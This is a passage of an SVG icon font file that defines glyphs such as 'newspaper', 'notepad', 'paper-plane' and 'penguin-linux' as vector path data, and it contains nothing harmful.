<glyph glyph-name="news" horiz-adv-x="1000" unicode="&#xefa6;" d="M891 473c-53 166-208 287-390 287-184 0-339-120-392-287h-46v-246h46c53-166 208-287 392-287 182 0 337 121 390 287h47v246h-47z m-53 0h-114c-4 26-10 52-18 77 24 10 47 20 71 30 27-33 47-68 61-107z m-98 145c-17-7-34-14-50-20-16 28-31 55-47 82 35-15 67-35 97-62z m-214 89c59-22 88-71 115-125-40-6-77-11-115-17v142z m0-191c15 2 31 3 46 5 26 4 52 9 77 14 5 1 9 1 10-5 6-19 10-37 14-57h-147v43z m-169 164c-16-27-31-54-47-82-16 6-32 13-50 20 30 27 62 47 97 62z m-134-100c24-10 47-20 71-30-8-25-13-51-18-77h-114c14 39 34 74 61 107z m-74-150c4 1 9 1 13 1 4 0 9 0 14-1l61-102v102c6 1 11 1 16 1 4 0 9 0 13-1v-160c-5-1-9-1-13-1-4 0-9 0-14 1l-62 102v-102c-5-1-9-1-14-1s-10 0-14 1l0 160z m13-203h114c5-26 10-52 18-77-24-10-47-20-71-30-27 33-47 68-61 107z m98-145c18 7 34 14 50 20 16-28 31-55 47-82-35 14-67 35-97 62z m215-87c-43 8-91 64-113 121 21 8 94 18 113 15v-136z m0 189c-21-2-42-4-63-7-21-3-41-8-62-12-5-1-8-1-9 5-6 19-10 38-14 57h148v-43z m-55 184c1-5 1-10 1-14 0-5 0-10-1-14h-46v-42h60c0-5 1-9 1-14 0-5-1-9-1-14h-93v160h91c1-5 1-9 1-14 0-5 0-9-1-14h-58v-34h46v0z m55 105h-146l11 55c2 7 4 8 11 7 39-10 79-16 120-18 1 0 2 0 4 0v-44z m0 95c-39 0-76 6-114 15 20 57 75 117 114 122v-137z m17-138c5 1 11 1 18 1 3 0 5 0 8 0 3 0 5-1 8-1l23-120 28 120c3 0 5 1 8 1 2 0 5 0 8 0 4 0 9 0 14-1l29-123 23 123c4 1 9 1 14 1 3 0 6 0 9 0 2-1 5-1 8-1l-39-160c-5-1-11-1-16-1-6 0-12 0-19 1l-25 106-28-106c-4 0-7 0-9-1-3 0-6 0-9 0-5 0-10 0-15 1l-38 160z m180-203c-4-19-9-37-12-56-2-5-3-7-9-6-42 7-83 14-126 21v41h147z m-147-232v140c39-6 76-11 114-16-18-54-70-117-114-124z m118 24c16 28 31 54 47 83 16-6 32-13 50-20-30-27-62-47-97-63z m134 101c-23 10-47 20-71 30 8 25 14 51 18 77h114c-14-38-34-74-61-107z m71 178c-3-6-7-12-12-16-6-5-12-8-20-11-7-2-16-3-26-3-5 0-9 0-13 0-4 0-8 1-11 2-3 0-7 1-10 2-4 1-7 2-11 4 0 4 1 9 2 13 1 5 3 10 5 14 6-2 12-4 17-5 6-2 12-2 18-2 9 0 16 1 22 5 5 3 8 9 8 16 0 3-1 6-2 9-1 2-3 4-5 6-2 1-4 3-7 4-2 1-5 2-8 3l-13 5c-5 2-10 4-14 7-4 2-7 5-10 8-3 3-5 7-7 11-1 5-2 10-2 16 0 8 1 14 4 20 2 6 6 11 11 15 5 4 10 7 17 9 7 2 14 3 22 3 8 0 15-1 22-2 6-2 13-4 20-6-1-9-3-17-7-25-2 0-4 1-6 2-3 1-5 2-8 3-2 0-5 1-9 1-3 0-6 1-10 1-3 0-6-1-8-1-3-1-5-1-7-2-2-2-4-3-5-6-2-2-2-5-2-9 0-3 0-5 1-7 1-2 3-4 5-5 1-2 3-3 5-4 3-1 5-2 7-2l14-6c5-2 10-4 15-7 5-2 8-5 12-8 3-4 5-8 7-13 2-5 3-11 3-18 0-8-2-15-4-21z" />
<glyph glyph-name="newspaper" horiz-adv-x="1000" unicode="&#xefa7;" d="M828 610v81c0 8-6 14-14 14h-737c-8 0-14-6-14-14v-587s0-110 109-110h683s82 2 82 110v478c0 8-6 14-14 14h-81c-8 0-14 6-14 14z m-711-506v532c0 8 7 15 15 15h627c8 0 15-7 15-15v-532c0-18 4-32 10-43 4-7 2-12-6-12h-606c-55 0-55 55-55 55z m69 437h518c8 0 15-6 15-14v-26c0-8-7-14-15-14h-518c-8 0-14 6-14 14v26c0 8 6 14 14 14z m301-328h163c8 0 14-6 14-14v-26c0-8-6-15-14-15h-163c-8 0-14 7-14 15v26c0 8 6 14 14 14z m0 110h217c8 0 15-7 15-15v-26c0-8-7-14-15-14h-217c-8 0-14 6-14 14v26c0 8 6 15 14 15z m0 109h217c8 0 15-7 15-14v-27c0-8-7-14-15-14h-217c-8 0-14 6-14 14v27c0 7 6 14 14 14z m-301 0h218c7 0 14-7 14-14v-245c0-8-7-15-14-15h-218c-8 0-14 7-14 15v245c0 7 6 14 14 14z" />
<glyph glyph-name="no-smoking" horiz-adv-x="1000" unicode="&#xefa8;" d="M247 409c-10 0-18-8-18-18v-84c0-10 8-18 18-18h207l-121 120h-86z m403-101v101h-101l101-101z m94 101h-70v-120h70c10 0 17 8 17 18v84c0 10-7 18-17 18z m65 250c-40 41-87 72-139 94-54 23-111 35-170 35-59 0-116-12-170-35-52-22-99-53-139-94-41-40-72-87-94-139-23-54-34-111-34-170 0-59 11-116 34-170 22-52 53-99 94-139 40-41 87-72 139-94 54-23 111-35 170-35 59 0 116 12 170 35 52 22 99 53 139 94 41 40 72 87 94 139 23 54 35 111 35 170 0 59-12 116-35 170-22 52-53 99-94 139z m-309-657c-93 0-180 36-246 102-65 66-102 153-102 246 0 78 26 152 72 212l488-487c-60-47-134-73-212-73z m276 136l-488 488c61 46 134 72 212 72 93 0 180-36 246-102 66-66 102-153 102-246 0-78-26-151-72-212z m-77 307c8-5 15-10 23-16 3-2 7-1 8 2 0 1 0 2 1 2 6 23-4 49-20 67-15 18-36 30-58 39-12 5-23 10-35 14-11 4-23 8-33 14-3 2-7 0-8-4 0 0 0-3 0-4 0-20 13-40 27-55 14-14 31-25 49-35 1-1 3-1 4-2 14-7 28-14 42-22z" />
<glyph glyph-name="not-allowed" horiz-adv-x="1000" unicode="&#xefa9;" d="M809 659c-40 41-87 72-139 94-54 23-111 35-170 35-59 0-116-12-170-35-52-22-99-53-139-94-41-40-72-87-94-139-23-54-34-111-34-170 0-59 11-116 34-170 22-52 53-99 94-139 40-41 87-72 139-94 54-23 111-35 170-35 59 0 116 12 170 35 52 22 99 53 139 94 41 40 72 87 94 139 23 54 35 111 35 170 0 59-12 116-35 170-22 52-53 99-94 139z m-309-657c-93 0-180 36-246 102-65 66-102 153-102 246 0 78 26 152 72 212l488-487c-60-47-134-73-212-73z m276 136l-488 488c61 46 134 72 212 72 93 0 180-36 246-102 66-66 102-153 102-246 0-78-26-151-72-212z" />
<glyph glyph-name="notebook" horiz-adv-x="1000" unicode="&#xefaa;" d="M890 788h-717c-7 0-12-6-12-12v-91c0-6 5-12 12-12h90c7 0 12-5 12-11v-92c0-7-5-12-12-12h-91c-6 0-11-5-11-11v-45c0-7 5-12 11-12h92c6 0 11-5 11-11v-93c0-6-5-11-11-11h-92c-6 0-11-5-11-12v-44c0-7 5-12 11-12h92c6 0 11-5 11-11v-93c0-6-5-11-11-11h-91c-7 0-12-5-12-12v-45c0-6 5-11 12-11h91c6 0 11-6 11-12v-92c0-6-5-12-11-12h-92c-6 0-11-5-11-11v-73c0-7 5-12 11-12h718c6 0 11 5 11 12v852c0 6-5 12-11 12z m-780-379h120c7 0 12 6 12 12v24c0 6-5 12-12 12h-120c-6 0-11-6-11-12v-24c0-6 5-12 11-12z m0-183h121c6 0 11 6 11 12v24c0 6-5 11-11 11h-121c-6 0-11-5-11-11v-24c0-7 5-12 11-12z m1 368h120c6 0 11 5 11 11v23c0 6-5 12-11 12h-120c-7 0-12-6-12-12v-23c0-6 5-11 12-11z m131-539v23c0 6-5 11-12 11h-120c-6 0-11-5-11-11v-23c0-7 5-12 11-12h120c7 0 12 5 12 12z" />
<glyph glyph-name="notepad" horiz-adv-x="1000" unicode="&#xefab;" d="M743 739c0 9 1 17 0 25-1 14-11 24-24 24-14-1-24-11-24-26 0-7 0-15 0-22h-24c0 7 0 15 0 22-1 15-11 26-25 25-14 0-24-11-24-26 0-7 0-14 0-22h-24c0 8 0 15 0 21-1 16-10 27-24 27-14 1-24-9-25-26 0-7 0-14 0-21h-25v11c0 26-7 37-24 37-16-1-24-11-24-37v-11h-24c0 8 0 16-1 24-1 14-11 24-24 24-13-1-24-11-24-26 0-7 0-15 0-22h-24c0 7 0 13 0 19 0 17-10 29-25 28-14 0-24-11-24-27 0-7 0-14 0-20h-24c0 7 0 13 0 19 0 17-10 28-24 28-15 1-24-10-25-27 0-7 0-14 0-21h-85v-827h656v827h-85z m-429-209c31 0 61 0 92 0h94c62 0 124 0 186 0 16 0 25-11 22-25-2-9-8-14-17-16-2 0-5 0-7 0h-368c-15 0-24 8-24 20 0 13 9 21 22 21z m0-83c31 0 62 0 93 0h94c62 0 123 0 185 0 15 0 25-10 22-25-1-9-8-15-17-16-2 0-5 0-7 0-122 0-245 0-368 0-15 0-24 7-24 20 0 12 9 21 22 21z m0-250c32 0 63 0 95 0h92c62 0 123 0 185 0 15 0 25-11 22-25-1-9-8-15-17-16-2-1-5-1-7-1h-368c-15 0-24 8-24 21 0 12 9 20 22 21z m373-125c-30 0-60 0-90 0h-97c-61 0-123 0-185 0-16 0-26 11-22 25 2 9 8 15 17 16 2 0 4 0 6 0h368c16 0 25-8 25-20 0-12-9-21-22-21z m0 167c-31 0-62 0-93 0h-95c-61 0-122 0-184 0-16 0-25 10-23 24 2 9 9 16 18 17 2 0 4 0 6 0h368c16 0 25-8 25-20 0-13-9-21-22-21z m0 83c-31 0-62 0-93 0h-95c-61 0-123 0-184 0-16 0-25 11-23 25 2 9 9 15 18 16 2 0 4 0 6 0h368c16 0 25-7 25-20 0-12-9-21-22-21z" />
<glyph glyph-name="notification" horiz-adv-x="1000" unicode="&#xefac;" d="M843 84c-3 7-4 17-2 25 21 57 41 113 63 170 22 60 40 120 31 186-10 75-41 139-96 190-27 25-58 45-89 68 2 6 6 17 10 27 6 17 1 30-13 36-15 5-27-1-34-18-4-10-8-21-13-32-41 10-83 14-124 8-125-17-214-83-263-199-29-71-54-145-80-218-4-9-9-14-17-18-45-20-88-40-133-60-11-6-20-13-20-27 0-15 11-20 23-25 82-29 164-59 247-88 12-5 17-10 16-23-4-92 82-161 171-137 36 9 64 30 84 62 5-2 9-3 12-4 84-31 168-61 252-91 12-4 24-6 34 5 11 11 7 22 1 34-20 43-41 86-60 129z m-380-87c-40 12-66 48-63 89 52-19 103-37 154-56-14-28-56-43-91-33z" />
<glyph glyph-name="numbered" horiz-adv-x="1000" unicode="&#xefad;" d="M270 477h-64v238h-12l-128-56c3-9 6-17 9-25 4-8 9-15 15-23l55 22v-156h-65c-1-5-2-10-2-14 0-4 0-8 0-12 0-5 0-9 0-14 0-4 1-8 2-13h190c1 5 1 9 1 13 1 5 1 9 1 14 0 4 0 8-1 12 0 4 0 9-1 14z m-96-439l24 32c9 11 17 23 24 33 8 10 14 20 19 30 5 9 10 19 13 29 3 10 4 20 4 30 0 15-3 28-8 39-5 10-13 19-22 27-10 7-22 12-35 15-13 4-28 5-44 5-8 0-16 0-23-1-6 0-13-1-19-3-6-1-12-3-18-5-7-2-13-5-20-7 0-9 2-18 5-27 3-8 6-17 10-25 5 2 9 4 13 5 5 2 9 3 14 5 4 1 9 2 14 2 4 1 10 1 17 1 15 0 28-3 36-10 9-7 14-17 14-29 0-8-2-15-5-22-2-7-7-15-12-24-6-8-12-18-20-28-8-10-18-21-28-35l-65-85 3-7h204c2 9 3 19 3 29 0 8-1 17-3 26h-95z m195 620h399c18 0 32 15 32 32v1c0 17-14 31-32 31h-399c-17 0-31-14-31-31v-1c-1-17 14-32 31-32z m537-57h-537c-17 0-32-14-32-31v-1c0-17 15-32 32-32h537c17 0 32 15 32 32v1c0 17-15 31-32 31z m0-121h-537c-17 0-32-14-32-31v-1c0-17 15-32 32-32h537c17 0 32 15 32 32v1c0 17-15 31-32 31z m-537-260h399c18 0 32 14 32 32v0c0 18-14 32-32 32h-399c-17 0-31-14-31-32l-1 0c0-18 15-32 32-32z m0-121h289c17 0 31 14 31 32v0c0 18-14 32-31 32h-289c-17 0-31-14-31-32l-1 0c0-18 15-32 32-32z m537-57h-537c-17 0-32-14-32-32v0c0-18 15-32 32-32h537c17 0 32 14 32 32v0c0 18-15 32-32 32z" />
<glyph glyph-name="opposite" horiz-adv-x="1000" unicode="&#xefae;" d="M773 459l110 110-110 109h-218v55c0 30-25 55-55 55s-55-25-55-55v-55h-164v-219h164v-54h-218l-110-110 110-109h218v-274h110v274h109v219h-109v54h218z" />
<glyph glyph-name="optic" horiz-adv-x="1000" unicode="&#xefaf;" d="M333 341c0 0 0-24-17-40-7-8-21-17-40-17-9 0-16-7-16-16s7-16 16-16c30 0 51 14 63 26 27 26 27 62 27 64-1 9-8 16-17 16-9-1-16-8-16-17z m484 0c0 0 0-24-17-40-8-8-21-17-40-17-9 0-16-7-16-16s7-16 16-16c30 0 51 14 63 26 27 26 26 62 26 64 0 9-8 16-16 16-9-1-16-8-16-17z m-74 203c-87 0-160-57-185-136-21 11-43 16-66 15-19-1-36-7-50-14-25 78-99 135-185 135-107 0-195-87-195-194s88-194 195-194c102 0 186 80 193 181 9 8 26 20 46 21 18 1 36-7 54-22 7-101 91-180 193-180 107 0 195 87 195 194s-88 194-195 194z m-486-323c-71 0-129 58-129 129s58 129 129 129 129-58 129-129-58-129-129-129z m486 0c-71 0-129 58-129 129s58 129 129 129c72 0 129-58 129-129 0-71-57-129-129-129z" />
<glyph glyph-name="options" horiz-adv-x="1000" unicode="&#xefb0;" d="M933 242c-17 15-34 30-50 46-36 36-36 94 0 129 15 15 31 29 47 44 5 4 6 12 4 18-13 31-26 61-39 92 0 2-1 3-1 4-3 2-7 5-10 4-23 0-46-3-68-3-49 0-89 38-92 86-1 24 1 48 2 72 1 7-1 11-8 13-32 13-63 26-95 39-7 3-11 1-15-4-15-17-29-33-45-49-36-36-94-36-130 0-16 16-31 33-46 50-3 4-6 5-12 3-32-14-64-28-97-41-6-3-8-6-8-13 2-22 4-44 4-66 0-49-38-90-86-92-25-1-49 1-74 2-6 0-8-2-11-7-13-32-26-65-39-97-3-6-2-9 3-13 16-15 33-29 48-44 37-36 39-93 3-130-15-16-31-31-48-46-4-4-6-12-4-17 13-31 26-62 39-94 3-7 7-8 13-8 22 2 45 4 67 4 48 0 89-38 91-86 1-24-1-49-2-73 0-6 1-9 7-12 32-13 64-26 96-39 7-3 11-2 15 4 14 16 29 33 44 48 37 37 95 37 132 0 15-15 29-31 43-46 4-5 12-6 18-4 31 13 62 26 93 39 6 3 8 6 8 12-2 23-4 45-4 67 0 49 38 90 87 92 24 1 48-1 73-2 6 0 9 2 11 7 13 33 26 65 39 97 3 6 2 9-3 14z m-429-57c-86-1-157 62-167 145-12 93 55 173 142 184 94 11 174-56 185-143 12-97-61-182-160-186z m-13 236c-37-5-66-39-61-80 4-35 35-63 72-62 43 1 74 38 69 80-5 38-39 67-80 62z" />
<glyph glyph-name="package" horiz-adv-x="1000" unicode="&#xefb1;" d="M854 713h-269v-176c0-8-4-13-7-10l-36 38c-1 1-3 1-4 0l-34-35c-1-3-2-4-4-4-2 0-3 1-4 4l-33 35c-2 1-3 1-5 0l-36-38c-3-4-7 2-7 10v176h-269c-46 0-83-39-83-87v-553c0-47 37-86 83-86h708c46 0 84 39 84 86v553c0 48-38 87-84 87z m-428-602c0-19-15-35-34-35h-195c-18 0-33 16-33 35v118c0 19 15 35 33 35h195c19 0 34-16 34-35v-118h0z m-162 138c-8 0-15 0-16-1-1 0-2 0-2-1-1-1-2-3-3-4 0-1 0-2 0-3v-140c0-2 0-5 2-6 1-1 2-1 2-2 2 0 9-1 17-1s17 1 19 2c1 1 1 3 2 5 0 0 0 1 0 2v139c0 3 0 5-1 7-2 3-12 3-20 3z m-62 0c-5 0-10 0-12-2-1-1-2-2-2-4 0 0 0-1 0-2v-142c0-2 0-4 1-5 3-2 9-3 13-3 4 0 9 1 11 2 1 1 2 2 2 4 0 1 1 2 1 2v142c0 2-1 4-2 5-2 2-8 3-12 3z m97 0c0 0-1 0-1 0-1 0-1 0-1 0-3-1-5-3-5-6 0-1 0-2 0-3v-140c0-5 1-7 5-8l0-1c1 0 2 0 2 0 0 0 2 0 4 2 1 1 2 2 2 4 1 1 1 2 1 2v142c0 2-1 4-2 5-2 2-5 3-5 3z m-70 0c0 0 0 0-1 0l0 0c-3-1-5-3-5-6-1-2-1-3-1-5v-138c0-3 1-4 2-6 2-3 5-3 5-3 1 0 3 0 5 2 1 1 2 2 2 4 0 1 0 1 0 2v142c0 2 0 4-1 5-2 2-5 3-6 3z m139 0c-4 0-10 0-11-2-1-1-2-2-3-4 0 0 0-1 0-2v-142c0-2 1-4 2-5 2-2 8-3 12-3s10 1 12 2c1 1 1 2 2 4 0 1 0 2 0 2v142c0 2 0 4-2 5-2 2-8 3-12 3z m28 0c0 0-1 0-1 0l-1 0c-3-1-5-3-5-6 0-2 0-3 0-5v-138c0-3 0-4 1-6 2-3 6-3 6-3 0 0 2 0 4 2 1 1 2 2 3 4 0 1 0 1 0 2v142c0 2-1 4-2 5-2 2-5 3-5 3z m-76 0c-1 0-1 0-2 0l0 0c-3-1-5-3-5-6 0-2 0-3 0-5v-138c0-3 0-4 1-6 2-3 5-3 5-3 1 0 3 0 5 2 1 1 2 2 2 4 0 1 0 1 0 2v142c0 2 0 4-1 5-2 2-5 3-5 3z m20 0c0 0-1 0-2-1-1 0-2 0-2-1-1-1-2-3-2-4-1-1-1-2-1-3v-140c0-2 0-5 2-6 1-1 2-1 3-2 1 0 2-1 2-1s3 0 5 2c2 2 2 19 2 39v77c0 19 0 36-2 38-2 2-4 2-5 2z" />
<glyph glyph-name="page" horiz-adv-x="1000" unicode="&#xefb2;" d="M828 788h-656c-30 0-55-25-55-55v-766c0-30 25-55 55-55h656c30 0 55 25 55 55v766c0 30-25 55-55 55z m-519-165h218c15 0 28-12 28-27 0-15-13-27-28-27h-218c-15 0-28 12-28 27 0 15 13 27 28 27z m383-546h-383c-15 0-28 12-28 27 0 15 13 27 28 27h382c16 0 28-12 28-27 0-15-13-27-27-27z m0 164h-383c-15 0-28 12-28 27 0 15 13 27 28 27h382c16 0 28-12 28-27 0-15-13-27-27-27z m0 164h-383c-15 0-28 12-28 27 0 15 13 27 28 27h382c16 0 28-12 28-27 0-15-13-27-27-27z" />
<glyph glyph-name="paint" horiz-adv-x="1000" unicode="&#xefb3;" d="M920 682c-2 4-6 7-10 8s-9-1-11-5c-16-22-36-29-59-37-19-7-38-14-59-29-30-21-44-50-37-78l-1-1c-12 18-26 35-40 50-67 69-160 111-256 115-4 0-8 0-13 0-107 0-209-48-281-131-71-83-102-191-86-297 1-9 3-18 5-26 26-116 93-204 184-242 23-10 45-14 67-14 56 0 104 29 132 81 11 19 18 39 21 60 2 12 1 24 0 35-1 12-3 23-1 35 4 26 23 41 49 41 7 0 15-1 23-3-9-17-17-32-24-47-16-31-26-56-31-76-4-12-13-44 9-59 7-5 16-6 25-5 8 2 33 7 104 87 19 22 39 47 61 75 55 18 98 64 109 117 3 14 4 28 4 43 20 31 38 61 57 93 0 1 0 1 1 2 26 7 49 28 62 57 19 42 18 95-4 151z m-298-198c-9-15-26-24-44-24-9 0-19 2-27 8-12 7-20 19-23 32-3 14-1 27 7 39 9 15 26 24 44 24 9 0 19-2 27-8 12-7 20-19 23-32 3-14 1-27-7-39z m68-94c26 39 54 77 80 111 4-4 9-8 14-11 9-6 18-11 27-14-22-38-46-75-75-118-48-70-97-135-139-183-24-27-45-48-60-61 6 20 17 47 34 79 29 57 71 127 119 197z m-460 0c-10 0-20 3-28 8-12 8-20 19-23 33-3 13-1 27 7 39 9 15 26 24 44 24 10 0 19-3 27-8 25-15 32-47 17-72-10-15-26-24-44-24z m-55-114c10 15 26 24 44 24 10 0 20-2 28-8 12-7 20-19 23-32 3-14 0-27-7-39-9-15-26-24-44-24-10 0-19 2-27 8-12 7-20 19-23 32s-1 27 6 39z m166 308c10 15 26 24 44 24 10 0 20-3 28-8 24-15 31-47 16-71-10-16-26-25-44-25-10 0-19 3-27 8-12 8-20 19-23 33-3 13-1 27 6 39z" />
<glyph glyph-name="paper-plane" horiz-adv-x="1000" unicode="&#xefb4;" d="M923 627c-281-59-559-117-839-176-14-3-23-7-21-8 1-2 2-3 4-4 62-48 124-96 187-145 5-4 7-8 7-15 0-66 0-132 0-197v-7c0-4 9-1 20 7 41 26 110 72 150 98 46-32 91-65 137-98 11-8 26-5 34 7 110 174 221 347 332 522 8 12 3 19-11 16z m-97-75c-7-4-13-8-20-13-140-89-280-178-419-268-7-4-12-9-16-16-23-38-45-76-67-114-1-2-2-3-3-4-2-3-3 6-3 20v76c0 20 0 40 0 60 0 7 2 10 8 13 77 37 153 74 230 112 100 48 200 97 300 145 1 1 3 1 5 2 2 0-4-6-15-13z" />
<glyph glyph-name="paperclip" horiz-adv-x="1000" unicode="&#xefb5;" d="M756 680h-96v12c0 14-11 25-25 25h-66v45c0 14-11 26-25 26h-88c-14 0-25-12-25-26v-45h-66c-14 0-25-11-25-25v-12h-96c-20 0-36-16-36-36v-696c0-19 16-36 36-36h512c19 0 35 17 35 36v696c0 20-16 36-35 36z m-292 77c0 2 1 3 3 3h66c1 0 2-1 2-3v-34h-71l0 34z m281-792c0-2-2-5-5-5h-481c-2 0-5 3-5 5v657c0 3 3 5 5 5h84v-38c0-14 11-25 24-25h265c14 0 25 11 25 25v38h83c3 0 6-2 6-5v-657z" />
<glyph glyph-name="papers" horiz-adv-x="1000" unicode="&#xefb6;" d="M810 688h-25v-628c0-42-34-76-76-76h-466v-23c0-27 22-49 49-49h518c27 0 48 22 48 49v679c0 27-21 49-48 48z m-101-676c26 0 48 21 48 48v679c0 27-22 49-48 49h-346v-16c1-2 1-4 1-6v-132c0-37-31-68-68-68h-133c-1 0-3 0-4 0h-17v-506c0-27 22-48 49-48h518z m-419 450h338c13 0 23-10 23-23s-10-23-23-23h-338c-12 0-22 11-22 23s10 23 22 23z m0-124h338c13 0 23-10 23-23 0-12-10-22-23-22h-338c-12 0-22 10-22 22s10 23 22 23z m-22-139c0 12 10 23 22 23h169c13 0 23-11 23-23s-10-23-23-23h-169c-12 0-22 10-22 23z m-105 394h133c22 1 40 18 40 41v132c0 13-10 21-20 21-5 0-10-2-15-6l-152-153c-13-13-4-35 14-35z" />
<glyph glyph-name="pay" horiz-adv-x="1000" unicode="&#xefb7;" d="M267 70c79 4 97 9 198 9h7v0h7l14 0 11 0c3 0 6-1 8-1 1 0 5 0 10 0 2 0 5 0 8 0 12 1 28 4 45 12 31 15 28 46 61 92 50 69 71 89 72 158 0 37 2 60 0 79l200-1c16 0 29 13 29 29l0 183c0 16-12 29-28 29l-315 1c-16 0-29-13-29-29l0-109c3-3 6-7 8-9 0 0 0 0 0-1 1 1 2 1 3 2 4 1 7 3 11 4v27l329-1 0-97c0-4-4-7-7-7l-234 0c-1-3-3-7-5-10-2-4-5-8-8-11-8-11-19-23-34-34l-4-26c0-8-2-18-5-28l-2-6c-2-2-27-26-52-43-3-2-6-3-9-5-3-2-6-3-8-5-5-1-10-1-14-1-16 0-31 6-32 29 0 0 8 27 93 79 22 14 38 27 49 40 3 3 6 7 8 11 3 3 5 7 7 10 14 25 10 43 10 43s2 35-31 35c-10 0-23-3-40-11 0 0-5-2-11-5-4-1-8-3-11-4-2 0-4-1-6-1 0 0 0 0 0 0-2 0-3 1-5 2-6 7-15 25-35 25-4 0-9-1-14-3-37-12-13-47-13-47s-51 16-83 16c-14 0-24-3-26-11-5-27 1-38 1-38s-74-3-69-33c6-31 16-35 47-35 30 0-143-36-230-113 0 0-37-29-72-37-35-9 51-183 51-183s60 25 145 30z m320 534l0 27c0 4 3 7 7 7l315 0c4 0 7-4 7-7l0-27-329 0z" />
<glyph glyph-name="penguin-linux" horiz-adv-x="1000" unicode="&#xefb8;" d="M812 112c-9 18-21 20-21-1 0-22 13-37 40-52 9-5 20-8 20-20 1-10-8-15-17-18-46-16-88-41-128-69-30-21-63-5-64 28-1 50 2 100-6 150-2 9-1 21 11 25 11 3 15-8 19-15 15-26 37-31 64-23 36 11 75 68 71 106-8 71-29 138-78 192-13 15-26 31-37 49-3 5-6 10-8 15-13 24-27 59-30 84-3 19-3 85-15 122-11 32-33 64-64 81-22 12-47 20-72 21-14 1-29-1-43-4-49-12-80-52-86-114-2-18-2-36 1-53 10-83 1-156-60-222-43-46-52-115-78-173-9-20-8-45 28-42 12 1 21-8 28-17 40-44 72-93 98-146 9-19 16-41 0-60-15-18-37-16-56-11-50 11-100 23-150 35-22 6-29 18-19 40 6 12 9 26 2 39-14 29-5 42 27 46 15 2 27 7 34 19 11 18-4 22-21 10-13-7-27-11-42-12-22-2-29-17-24-39 4-21 8-42-1-65-13-35-4-50 33-58 18-4 176-45 179-46 28-13 87 65 109 65h4c39 0 82-12 119-12 14 0 25-12 35-23 35-35 77-40 115-8 27 23 55 40 87 55 1 0 3 1 4 1 3 1 19 11 34 26 17 18 23 34 6 45-20 13-37 28-48 49z m-378-87c-5 3-35 11-24 23 17 20 11 39-7 56-12 11-43 39-64 63-14 15-29 47-33 67-7 40-1 86-1 86 0 5 2 7 4 8 4 2 3-19 5-40l0-6c3-21 12-20 18 0 9 31 21 61 37 90 14 24 10 58 26 85 9 15 14 21 27 4 18-25 40-24 64-7 17 12 35 22 53 34 7 5 19 9 13 19-6 10-16 3-24-1-14-6-27-14-43-19-20-7-22 2-2 10 22 9 42 16 62 24 7 3 17 8 12 16-5 11-13 1-20-2-28-13-57-23-89-23-20 1-36 11-41 29-5 17 15 21 25 30 4 4 7 7 11 9 6 5 12 8 11 10 0 1 0 3 0 3 2 12 2 21 0 28-3 15-33 21-42 10-9-10-9-25-9-25 1-6-1-9-3-11-4-3-11 18-5 38 7 22 20 25 33 25 50 0 46-69 44-70 0 0 0 0 0 0-1 0 5-2 10-6 6-3 12 0 13 11 0 6 0 12 1 18 0 40 23 50 40 47 51-7 45-69 43-70-6-5-9-6-12-6-8 0-5 14-5 18 1 2 1 4 1 7 0 4 0 8 0 13-1 7-5 16-10 19s-24 6-34-7c-9-12-9-34-8-42 1-6 2-12 6-15 8-5 17-10 27-13 19-6 27-16 22-37-4-17 0-33 9-48 29-52 63-146 77-213 5-20 12-32 16-25 4 7 9 31 11 52 1 24-1 57-13 85-8 19-6 22 6 5 14-20 26-51 22-99-2-21 1-44 10-52 8-8 1-7-16-9-18-3-29-19-30-24-1-4-3-7-5-9-43-25-37-63-34-102 1-11-23-27-27-31-46-47-99-56-158-30z m13 595c5-10 1-12-4-2-4 10-1 13 4 2z m101 5c-6 9-2 13 6 4 7-9 1-12-6-4z" />
<glyph glyph-name="pestle" horiz-adv-x="1000" unicode="&#xefb9;" d="M798 499v1h-20s0 1 0 1h-127l0-1h-215l-24 45c6 4 8 10 6 15-2 4-9 5-15 1l-113 208c6 4 9 11 7 15-3 4-10 5-16 1l-87-54c-6-3-9-10-7-15 2-4 9-5 15-1l113-208c-3-2-5-4-6-7h-20v-1c-9-3-16-11-16-20 0-9 7-16 16-19v-175c0-185 71-245 168-260v-50c-74-7-127-29-127-62h427c0 33-53 55-127 62v50c97 15 168 75 168 260v175c9 3 16 11 16 19 0 9-7 17-16 20z" />
<glyph glyph-name="phone-circle" horiz-adv-x="1000" unicode="&#xefba;" d="M426 450c-82-47 43-281 132-230l83-143c-38-22-70-36-113-11-122 70-256 301-252 439 1 48 30 67 67 88 16-27 67-116 83-143z m34 4c-9-5-20-2-25 6l-79 136c-5 9-2 20 7 25l41 24c9 5 21 2 26-7l78-135c5-9 2-21-7-26l-41-23z m214-370c-9-6-21-3-26 6l-78 136c-5 9-2 20 7 25l41 24c9 5 20 2 25-7l79-135c5-9 2-21-7-26l-41-23z m-174 704v-1c121 0 230-48 309-128 79-79 128-188 128-309h1-1c0-121-48-230-128-309-79-79-188-128-309-128v-1 1c-121 0-230 48-309 128-79 79-128 188-128 309h0 0c0 121 49 230 128 309 79 79 188 128 309 128v1z m0-53v0 0c-106 0-203-43-272-113-70-69-113-166-113-272h0 0c0-106 43-203 113-272 69-70 166-113 272-113v0 0c106 0 203 43 272 113 70 69 113 166 113 272h0 0c0 106-43 203-113 272-69 70-166 113-272 113z" />
<glyph glyph-name="phone" horiz-adv-x="1000" unicode="&#xefbb;" d="M391 497c-121-70 63-414 195-338l122-211c-56-32-103-53-167-16-179 102-376 443-370 646 2 71 43 99 98 130 23-40 98-171 122-211z m50 5c-13-7-30-3-37 10l-115 200c-8 13-3 29 10 37l60 35c13 7 30 3 38-10l115-199c7-13 3-30-10-38l-61-35z m315-544c-13-8-30-3-38 10l-115 199c-7 13-3 30 10 38l61 34c13 8 29 4 37-10l115-199c8-13 3-30-10-37l-60-35z" />
<glyph glyph-name="picture" horiz-adv-x="1000" unicode="&#xefbc;" d="M156 640c8-7 22-13 32-13h632c11 0 24 6 31 13l54 61c7 7 4 13-6 13h-801c-10 0-12-5-5-12l63-62z m693-580c-7 7-21 13-31 13h-631c-10 0-24-6-31-13l-62-62c-7-7-4-13 6-13h801c10 0 12 6 5 14l-57 61z m76 620l-48-54c-7-8-12-22-12-32v-490c0-10 5-24 12-32l48-51c7-7 13-5 13 5v649c0 10-6 12-13 5z m-775-567v474c0 10-6 24-13 31l-61 60c-8 7-13 5-13-5v-647c0-10 5-13 12-5l62 61c7 7 13 21 13 31z m47 485c-10 0-18-8-18-18v-460c0-10 8-18 18-18h620c10 0 18 8 18 18v460c0 10-8 18-18 18h-620z m493-288c0-10-9-18-19-18h-22c-10 0-18 8-18 18v36c0 10 8 18 18 18h22c10 0 19-8 19-18v-36z m116-179h-29v215c0 10-6 24-13 32l-91 93c-7 7-18 7-25 